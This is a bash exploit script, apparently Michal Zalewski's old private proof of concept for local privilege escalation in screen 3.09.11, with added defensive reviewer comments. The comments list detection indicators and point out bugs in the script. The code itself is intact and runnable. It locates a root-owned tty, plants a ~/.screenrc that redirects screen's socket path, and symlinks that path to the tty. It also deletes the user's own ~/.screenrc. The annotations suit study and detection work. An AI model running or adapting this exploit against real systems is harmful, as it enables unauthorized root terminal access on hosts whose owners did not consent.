#!/bin/bash
# **DO NOT DISTRIBUTE**
#
# A simple screen(1) exploit (tested against 3.09.11)
# - by Michal Zalewski (lcamtuf@bos.bindview.com)
# ----------------------------------------------------
# Usage: "./unscreen", then resume screen `00'.
# ----------------------------------------------------
# Ugh, blah... Should be written in C, but I don't
# really care now :)
# I haven't had time to check other versions, but see
# if this works for you too...
#
# This exploit is private, but you know that already...
#
# **DO NOT DISTRIBUTE**
#
# ---------------------------------------------------------------------
# Reviewer notes (defensive reading of this historical proof of concept)
#
# This is a local privilege-escalation PoC against a 1999-era screen(1)
# (the header says 3.09.11). Everything it does is visible below: it
# writes a ~/.screenrc whose `defsocketpath` points at a path under $HOME,
# starts a detached screen session using that rc, and then replaces that
# path with a symlink to a tty device owned by uid 0. What screen itself
# does with the redirected socket path is NOT in this file; the script
# presumably relies on a screen binary that ran with elevated privileges
# at the time, so exposure of any given host has to be confirmed against
# the installed screen version rather than assumed from this script.
#
# Indicators worth alerting on, all taken from the lines below:
#   - `umask 0` followed by file creation in $HOME and /tmp
#   - a ~/.screenrc containing `defsocketpath` (and it is deleted again
#     seconds later, which also destroys the user's real ~/.screenrc)
#   - symlinks under $HOME or /tmp whose target is /dev/tty* or /dev/pts/*
#   - `screen -S 00 ... -m -D` immediately followed by `screen -wipe`
#
# Portability/correctness oddities are commented inline but deliberately
# left as-is: this listing is kept as a sample, not maintained as a tool.
# ---------------------------------------------------------------------
SCREEN=/usr/bin/screen
# umask 0: every file and symlink created by this script is world-writable.
umask 0
# $SCREEN is unquoted; harmless here only because the value has no spaces.
if [ ! -x $SCREEN ]; then
echo "I can't execute $SCREEN..."
exit 0
fi
# LINK = "$HOME" + a literal space + ".pts-00.dupa": awk prints field 1
# followed by " ", and the backtick substitution only strips the newline.
# Every later *unquoted* use of $LINK therefore word-splits into two
# operands ("$HOME" and ".pts-00.dupa"); presumably intentional, but the
# reason is not stated anywhere in the script.
LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa
# Quoted here, so this tests the single path with the embedded space.
if [ -f "$LINK" ]; then
echo "DAMN. I don't have usable pts socket available..."
exit 0
fi
# `echo -ne` is bash-specific (non-portable under /bin/sh).
echo -ne "Finding root owned tty...\t\t"
unset TTY
# Scan candidate tty device nodes and keep the first whose numeric owner
# (field 3 of `ls -ln`) is uid 0. `awk {'print $3'}` is unusual quoting
# but the shell concatenates it into the same awk program as '{print $3}'.
for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
TTY="$x"
break
fi
done
echo -n "$TTY"
if [ "$TTY" = "" ]; then
echo -e "\nI can't find a root owned tty!"
exit 0
fi
# `-o` inside `[ ]` is the deprecated/ambiguous form; needs $HOME and /tmp
# both writable.
if [ ! -w $HOME -o ! -w /tmp ]; then
echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
exit 0
fi
# Overwrites any existing ~/.screenrc with no backup (and line 76 below
# deletes it afterwards). The `defsocketpath` line is the key indicator:
# it makes the session's socket path the attacker-controlled $LINK.
# The termcapinfo line sets hs/ts/fs/ds capabilities, which look like
# hardstatus-line escapes; their role here is not visible in this file.
cat >$HOME/.screenrc <<_EOF_
vbell on
defscrollback 100
autodetach on
termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'
defsocketpath $LINK
_EOF_
echo -ne "\nStarting screen...\t\t\t"
# Start a detached session named "00" with the rc file just written; all
# output discarded and the process backgrounded.
$SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null &
# `echo $!` in a subshell is redundant; SCPID=$! would do the same.
# SCPID is printed but never used afterwards.
SCPID=`echo $!`
echo -n "PID: $SCPID"
# `$# -ge 0` is always true (argument count is never negative), so this
# loop sleeps exactly once and then breaks; it is not a real wait.
while :; do
sleep 1
if [ "$#" -ge "0" ]; then
break
fi
done
cd /tmp
# $LINK unquoted -> two source operands ("$HOME" and ".pts-00.dupa") are
# symlinked into $HOME/; the relative ".pts-00.dupa" resolves against
# /tmp, the cwd set just above. Errors are discarded.
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"
# Poll up to 5 seconds for $LINK (the full path, quoted) to exist as a
# regular file. `let` arithmetic is bash-specific.
CNT=5 # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
let CNT=$CNT-1
sleep 1
done
# Printed unconditionally: "Done." is shown even when the 5 s timeout
# expired without the file appearing.
echo -n "Done."
echo -ne "\nLinking to root owned terminal...\t\t"
# The core symlink swap: the socket path now resolves to the uid-0 tty
# found earlier. Again $LINK is unquoted and word-splits. This is the
# filesystem state a monitor should look for: a symlink whose target is
# a /dev/tty* or /dev/pts/* node.
ln -fs $TTY $LINK &>/dev/null
echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."
# Background `screen -wipe`, then remove the rc and the link(s); the
# user's original ~/.screenrc is gone at this point.
$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null
echo -ne "\rComplete.\n"
# Exits 1 on the "success" path while every failure path above exits 0.
exit 1